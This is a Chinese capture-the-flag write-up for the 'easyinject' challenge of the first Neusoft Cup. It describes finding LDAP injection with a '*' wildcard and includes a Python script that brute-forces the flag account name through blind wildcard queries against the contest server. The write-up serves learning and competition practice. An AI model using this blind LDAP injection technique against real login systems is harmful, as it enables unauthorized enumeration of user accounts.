第一届 “东软杯”_easyinject题解
本文最后更新于 507 天前,其中的信息可能已经有所发展或是发生改变。
前言
这道题是一道注入题 从题目名字就可以发现。
详细步骤
在开始做题使用 ' or 1=1# 进行注入的时候发现完全不会生效,于是联想道之前看见过的ldap注入题
使用*进行尝试确实是ldap注入题。
如何主页的源码中存在提示
提示说明flag是一串特殊的账户,盲注出用户即可
import string
import requests
url = "http://47.106.172.144:2333/?user={}*&pass=123456"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
"Content-Type": "application/xml"
}
chars = string.ascii_letters+string.digits + '_'
flag = "ldap"
for i in range(1,100):
for s in chars:
payload = url.format(flag + s)
result = requests.get(url=payload,headers=headers)
if result.status_code == 200:
if "找不到用户" not in result.text:
flag += s
print(flag)
break
else:
print('检测到爬虫')结果
浏览量: 153
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-12-05 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
